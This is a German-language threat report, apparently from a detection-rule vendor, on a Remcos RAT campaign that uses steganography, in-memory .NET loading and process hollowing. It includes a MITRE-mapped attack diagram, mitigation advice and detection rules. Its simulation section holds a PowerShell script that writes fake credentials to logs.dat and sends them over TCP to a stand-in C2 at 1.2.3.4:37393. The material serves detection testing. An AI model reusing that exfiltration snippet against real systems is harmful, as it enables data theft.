Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine mehrstufige Malware-Kampagne nutzt Steganografie und In-Memory-Ausführung, um mehrere Payloads, einschließlich Remcos RAT, auszuliefern. Die Infektionskette beginnt mit einer Phishing-E-Mail, die ein bösartiges Archiv enthält, das eine .NET-Anwendung ablegt. Diese Anwendung verwendet eingebettete Ressourcen und steganografische Methoden, um spätere Phasen direkt in den Speicher zu laden, was der Malware hilft, Festplatten-basierte Erkennung zu vermeiden.
Untersuchung
Die Untersuchung begann, nachdem die Telemetrie eine verdächtige Datei namens GST Debit Note Apr_26.comgekennzeichnet hatte. Analysten stellten fest, dass die Datei eine gepackte 32-Bit-.NET-Anwendung war, die als Spiel getarnt war. Weitere Reverse Engineering-Recherchen enthüllten Steganografie, die in einem .NET-Bitmap-Objekt eingebettet war und den Ladeprogramm der nächsten Stufe, Optimax.dll, verbarg und es ermöglichte, vollständig im Speicher zu laufen.
Minderung
Organisationen sollten starke E-Mail-Filter einsetzen, um verdächtige Archiv-Anhänge und Phishing-Versuche zu blockieren. EDR-Lösungen sollten in der Lage sein, In-Memory-Ausführung, Prozesshollowing und verdächtiges PowerShell-Verhalten zu erkennen. Teams sollten auch unautorisierte Registrierungseinträge überwachen, insbesondere in den Run-Schlüsseln, und strikte Anwendungssteuerung durchsetzen, um zu verhindern, dass nicht signierte Anwendungen gestartet werden.
Reaktion
Betroffene Endpunkte sollten sofort isoliert werden, um seitliche Bewegungen und Datendiebstahl zu begrenzen. Ermittler sollten Speicherforensik durchführen, um dateifreie Komponenten zu identifizieren und das Vorhandensein des Remcos_Mutex_Inj Mutex zu bestätigen. Eine vollständige Überprüfung sollte auch auf unautorisierte Persistenz im AppData Verzeichnis und in den Run-Schlüsseln der Registrierung überprüfen, während die Anmeldeinformationen für alle Benutzer, deren Browser möglicherweise vom Malware erreicht wurden, zurückgesetzt werden sollten.
graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ff99cc classDef technique fill:#c2f0c2 classDef file fill:#e1e1e1 %% Node Definitions %% Initial Access attack_phishing[„<b>Aktion</b> – <b idea=’T1566.001′>Phishing: Spearphishing Anhang</b><br/><b>Details</b>: Bösartiges Archiv GST Debit Note Apr_26.com an die Opfer gesendet.“] class attack_phishing action %% Evasion and Loader Stage 1 evasion_stego[„<b idea=’T1027.003′>Verschleierte Dateien oder Informationen: Steganografie</b><br/><b>Details</b>: Verstecken von Optimax.dll in einem serialisierten .NET-Bitmap-Objekt<br/>innerhalb des ausführbaren Ressourcensegments.“] class evasion_stego technique exec_appdomain[„<b idea=’T1574.014′>Umleitung des Ausführungsflusses: AppDomainManager</b><br/><b>Details</b>: Verwenden von Reflection und AppDomain.Load, um<br/>Payload direkt aus dem Speicher auszuführen, ohne die Festplatte zu berühren.“] class exec_appdomain technique %% Second Stage loader_stage2[„<b idea=’T1055.012′>Prozessinjektion: Prozesshollowing</b><br/><b>Details</b>: System Optimizer Ultimate.dll setzt die endgültige Nutzlast frei<br/>indem ein Standard-Browser-Prozess gehollowt wird.“] class loader_stage2 technique malware_remcos[„<b idea=’Malware‘>Remcos RAT</b><br/><b>Beschreibung</b>: Remote Access Trojan, bereitgestellt<br/>als die endgültige Nutzlast.“] class malware_remcos malware %% Persistence and Evasion evasion_sandbox[„<b idea=’T1497′>Virtuelle Umgebung/Sandbox-Ausweichung</b><br/><b>Details</b>: Überprüfen von sbiedll.dll und Registrierungsschlüsseln<br/>zur Erkennung von Sandboxes oder virtuellen Maschinen.“] class evasion_sandbox technique persistence_active[„<b idea=’T1547.014′>Start- oder Anmeldeausführung: Aktive Einrichtung</b><br/><b>Details</b>: Kopieren von Malware in AppDataRoaming und<br/>Konfigurieren eines Run-Registrierungsschlüssels zur Persistenz.“] class persistence_active technique %% Collection and Exfiltration collect_browser[„<b idea=’T1217′>Entdecken von Browser-Informationen</b><br/><b>Details</b>: Sammeln von Chrome- und Firefox-Anmeldedaten.“] class collect_browser technique steal_cookies[„<b idea=’T1539′>Diebstahl von Web-Sitzungscookies</b><br/><b>Details</b>: Erfassen aktiver Web-Sitzungscookies.“] class steal_cookies technique exfil_c2[„<b idea=’T1041′>Exfiltration über C2-Kanal</b><br/><b>Details</b>: Senden der erfassten Daten von logs.dat<br/>an den Angreifer über Kommando und Steuerung.“] class exfil_c2 technique file_logs[„<b idea=’File‘>logs.dat</b><br/><b>Beschreibung</b>: Lokale Datei zum Speichern<br/>gestohlener Anmeldedaten und Cookies.“] class file_logs file %% Connections %% Flow of attack attack_phishing –>|führt zu| evasion_stego evasion_stego –>|packt aus| exec_appdomain exec_appdomain –>|lädt| loader_stage2 loader_stage2 –>|setzt ein| malware_remcos %% Malware actions malware_remcos –>|führt aus| evasion_sandbox malware_remcos –>|etabliert| persistence_active malware_remcos –>|führt aus| collect_browser collect_browser –>|führt zu| steal_cookies steal_cookies –>|speichert in| file_logs file_logs –>|gesendet über| exfil_c2
Angriffsfluss
Erkennungen
Aufruf verdächtiger .NET-Methoden von Powershell (über powershell)
Ansehen
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER-Hive] (über registry_event)
Ansehen
Die Möglichkeit der Ausführung durch versteckte PowerShell-Kommandozeilen (über cmdline)
Ansehen
Mögliche PowerShell-Obfuskationsindikatoren (über powershell)
Ansehen
Exfiltration erfasster Daten zu Command und Control [Windows-Netzwerk-Verbindung]
Ansehen
Ausführung eines obfuskierten PowerShell-Skripts in der Steganografie-Loader-Kampagne [Windows Powershell]
Ansehen
Erkennung der Remcos RAT-Infektion durch Steganografie- und dateifreie Techniken [Windows-Prozesserstellung]
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie- & Grundlinien-Vorflug-Check muss bestanden sein.
Begründung: Dieser Abschnitt erläutert die genaue Ausführung der Angreifertechnik (TTP), die zum Auslösen der Erkennungsregel entwickelt wurde. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennung erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu einer Fehldiagnose.
-
Angreifererzählung & Befehle: Der Angreifer hat erfolgreich einen Fuß in der Tür. Um das Ziel zu erreichen, sammeln sie Systemtelemetrie und verstecken diese in einer Datei namens
logs.dat, um als Standard-Systemprotokolle getarnt zu erscheinen. Der Angreifer initiiert dann eine Netzwerkverbindung zur etablierten C2-Infrastruktur (unter Verwendung der IP1.2.3.4und Port37393für diese Simulation) um die Daten zu exfiltrieren. Dies ahmt das Verhalten eines steganografischen Loaders nach, der versucht, Daten über einen spezifischen, hartcodierten Kanal aus dem Netzwerk zu bewegen. -
Regressionstest-Skript:
# Simulation der Datenexfiltration über spezifischen Dateinamen und C2-Parameter $C2_IP = "1.2.3.4" # Simulierte C2-IP $C2_PORT = 37393 $FILENAME = "logs.dat" # 1. Erstellen der 'bösartigen' Daten-Datei Write-Output "Sensitive Data: UserCredentials_Admin_Pass123" | Out-File -FilePath "$env:TEMP$FILENAME" # 2. Simulierte Netzwerkverbindung zum C2 # Verwenden eines TCP-Clients, um die spezifische Port/IP-Telemetrie zu erzwingen try { $client = New-Object System.Net.Sockets.TcpClient($C2_IP, $C2_PORT) $stream = $client.GetStream() $data = [System.Text.Encoding]::ASCII.GetBytes((Get-Content "$env:TEMP$FILENAME")) $stream.Write($data, 0, $data.Length) $client.Close() } catch { Write-Host "Verbindung fehlgeschlagen (erwartet, falls IP nicht existent ist), aber die Telemetrie sollte von der Firewall erfasst werden." } -
Bereinigungsbefehle:
# Entfernen der simulierten bösartigen Datei Remove-Item -Path "$env:TEMPlogs.dat" -ErrorAction SilentlyContinue